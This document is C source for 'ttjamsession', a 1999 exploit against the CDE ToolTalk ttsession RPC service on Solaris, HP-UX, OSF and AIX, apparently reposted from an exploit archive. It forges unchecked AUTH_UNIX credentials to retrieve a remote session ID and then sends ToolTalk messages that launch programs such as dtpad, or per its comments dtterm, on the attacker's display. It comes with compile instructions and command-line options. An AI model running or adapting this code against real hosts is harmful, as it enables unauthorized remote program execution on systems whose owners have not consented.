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- /*
- * ttjamsession.c
- * Job de Haas
- * (c) ITSX bv 1999
- *
- * Solaris 7, 2.6, 2.5.1
- * OSF v4.0
- * HP-UX B.10.20
- * AIX 2 4 000096754200
- *
- * This is a simple ttsession exploit to show some problems with
- * authentication of a remote user. The possibilities after authentication
- * are not limited to starting dtpad, but rather any ptype as can be shown
- * with tt_type_comp. On Solaris this includes dtterm.
- *
- * compile with:
- * cc -L/usr/dt/lib -I/usr/dt/include -I/usr/openwin/include -ltt -lnsl
- * ttjamsession.c -o ttjamsession
- *
- */
- #include <stdio.h>
- #include <stdlib.h>
- #include <rpc/rpc.h>
- #include <string.h>
- #include <netdb.h>
- #include <arpa/inet.h>
- #include <pwd.h>
- #include <Tt/tt_c.h>
- #include <Tt/tttk.h>
- #define TTSESSION_PROG 1342177279
- #define TTSESSION_PROG_SOL7 1289637086
- #define TTSESSION_VERS 3
- long rpcprog = TTSESSION_PROG;
- int version = TTSESSION_VERS;
- long uid = -1;
- int use_env = 0;
- int test = 0;
- /*
- * For some reason the string is not returned with xdr_wrapstring. After
- * some fiddling this seems to work.
- *
- */
- xdr_mystring(xdrs, objp)
- register XDR *xdrs;
- char **objp;
- {
- int len;
- if (!xdr_int(xdrs, &len))
- {
- return 0;
- }
- *objp = (char *)malloc(len + 1);
- if (xdr_opaque(xdrs, (caddr_t)*objp, len))
- {
- (*objp)[len] = '\0';
- }
- else
- {
- return 0;
- }
- return(1);
- }
- /*
- * This is some generated code by ttsnoop (nice program! at least on sol 2.6)
- * It was modified a bit to get it to spawn the program on the correct display
- */
- Tt_callback_action
- process_Instantiate_reply( Tt_message msg, Tt_message pat );
- Tt_message
- create_Instantiate(
- Tt_message context,
- char *action
- )
- {
- Tt_message msg;
- msg = tttk_message_create( context, TT_REQUEST, TT_SESSION,
- 0, action,
- (Tt_message_callback)process_Instantiate_reply );
- tt_message_arg_add( msg, TT_IN, "data", "data");
- tt_message_context_set( msg, "$DISPLAY", getenv("DISPLAY"));
- tt_message_disposition_set( msg, TT_START);
- tt_message_handler_ptype_set( msg, "DTPAD");
- return msg;
- }
- static Tt_callback_action
- process_Instantiate_reply(
- Tt_message msg,
- Tt_message pat
- )
- {
- switch (tt_message_state(msg))
- {
- case TT_SENT: /* handler is in this process */
- case TT_STARTED:/* intermediate state */
- case TT_QUEUED: /* intermediate state */
- default: /* unknown state */
- case TT_HANDLED:
- /* ... */
- break;
- case TT_FAILED:
- {
- int status;
- char *string;
- status = tt_message_status( msg );
- string = tt_message_status_string( msg );
- printf("message failed with: %s\n",string);
- /* ... */
- }
- break;
- }
- tt_message_destroy( msg );
- }
- /*
- * The routine to get the remote sessionid string.
- *
- */
- int
- get_sessionid( remotehost, port)
- char *remotehost;
- ushort port;
- {
- struct sockaddr_in server_addr;
- enum clnt_stat clnt_stat;
- struct hostent *hp;
- struct timeval timeout;
- CLIENT *clnt;
- int msock;
- char *buf;
- char *env;
- char *hostname;
- char localhost[MAXHOSTNAMELEN];
- memset((char *)&server_addr, 0, sizeof (server_addr));
- if (remotehost)
- {
- server_addr.sin_family = AF_INET;
- server_addr.sin_addr.s_addr = inet_addr(remotehost);
- if ( server_addr.sin_addr.s_addr == -1 )
- {
- if ((hp = gethostbyname(remotehost)) == NULL)
- {
- printf("Can't resolve %s\n",remotehost);
- exit(1);
- }
- memcpy((char *)&server_addr.sin_addr, hp->h_addr, hp->h_length);
- hostname = strdup( remotehost );
- }
- }
- else
- {
- if (gethostname(localhost, MAXHOSTNAMELEN)<0)
- {
- perror("gethostname");
- exit(1);
- }
- if (hp = gethostbyname(localhost))
- {
- memcpy((char *)&server_addr.sin_addr, hp->h_addr, hp->h_length);
- hostname = strdup( localhost );
- }
- else
- {
- server_addr.sin_addr.s_addr = inet_addr("");
- hostname = strdup( "" );
- }
- }
- server_addr.sin_family = AF_INET;
- server_addr.sin_port = htons(port);
- msock = RPC_ANYSOCK;
- timeout.tv_sec = 15;
- timeout.tv_usec = 0;
- if ( (clnt = (CLIENT *)clnttcp_create(&server_addr, rpcprog,
- TTSESSION_VERS, &msock, 10000, 10000)) == NULL)
- {
- clnt_pcreateerror("clnttcp_create");
- exit(1);
- }
- /*
- * apparently credentials are not checked!
- */
- clnt->cl_auth = authunix_create(hostname, 0, 0, 0, NULL);
- if ((clnt_stat = clnt_call(clnt, TTSESSION_GETSESSID,
- (xdrproc_t) xdr_void, (caddr_t) 0,
- (xdrproc_t) xdr_mystring, (caddr_t) &buf,
- timeout)) != RPC_SUCCESS)
- {
- clnt_perror(clnt, "get session");
- return(-1);
- }
- /*
- * put TT_SESSION in the environment for tt_open to use.
- */
- env = malloc( strlen("TT_SESSION=") + strlen( buf+2 ) +1);
- strcpy(env,"TT_SESSION=");
- strcat(env,buf+2);
- putenv( env );
- printf("Session ID: %s\n", buf);
- return(0);
- }
- usage(progname)
- char *progname;
- {
- fprintf(stderr,
- "Usage: %s [-p port] [-r rpc prognumber] [-u uid]\n", progname);
- fprintf(stderr," [-7] [-t] [-e] hostname\n");
- fprintf(stderr,"[-7] use Solaris 7 default ttsession program number\n");
- fprintf(stderr,"[-t] test the RPC call but not send messages\n");
- fprintf(stderr,"[-e] get TT_SESSION from environment (no RPC call)\n");
- exit(-1);
- }
- int main(argc, argv)
- int argc;
- char **argv;
- {
- char *hostname = NULL;
- struct in_addr addr;
- extern int optind;
- extern char *optarg;
- short port = 0;
- char c, *cp;
- Tt_message context, msg;
- char *procid;
- while ((c = getopt(argc, argv, "u:p:r:7et")) != EOF)
- {
- switch (c)
- {
- case 'r':
- rpcprog = atoi(optarg);
- break;
- case 'p':
- port = atoi(optarg);
- break;
- case 'u':
- uid = atoi(optarg);
- break;
- case '7':
- rpcprog = TTSESSION_PROG_SOL7;
- break;
- case 'e':
- use_env = 1;
- break;
- case 't':
- test = 1;
- break;
- default:
- usage(argv[0]);
- }
- }
- if (optind < argc)
- {
- hostname = strdup(argv[optind++]);
- }
- if (optind < argc)
- {
- port = atoi(argv[optind++]);
- }
- if (optind < argc)
- {
- usage(argv[0]);
- }
- /* setup the socket and test correct service */
- if ( !use_env && (get_sessionid( hostname, port ) < 0 ))
- {
- printf("Failed to properly connect to ttsession\n");
- exit(1);
- }
- if (test) exit(0);
- /*
- * Open up the channel to ttsession. The code uses the TT_SESSION
- * environment var to figure out how.
- */
- if (((procid = tt_open()) == NULL) || (*procid == '\0'))
- {
- perror("tt_open");
- exit(1);
- }
- /*
- * Now we can send messages... like instantiate a dtpad!
- * Two messages are sent to cause a new dtpad -server to be started
- * so that the dtpad will be displayed on our server even if the local
- * user is also using dtpad. I use sleep cause I can't seem to trigger
- * the callback.
- *
- */
- msg = create_Instantiate(context, NULL);
- tt_message_send(msg);
- sleep(10);
- msg = create_Instantiate(context, "Instantiate");
- tt_message_send(msg);
- sleep(10);
- /* no idea if I got to wait for the callback */
- exit(0);
- }
- /* www.hack.co.za [2000]*/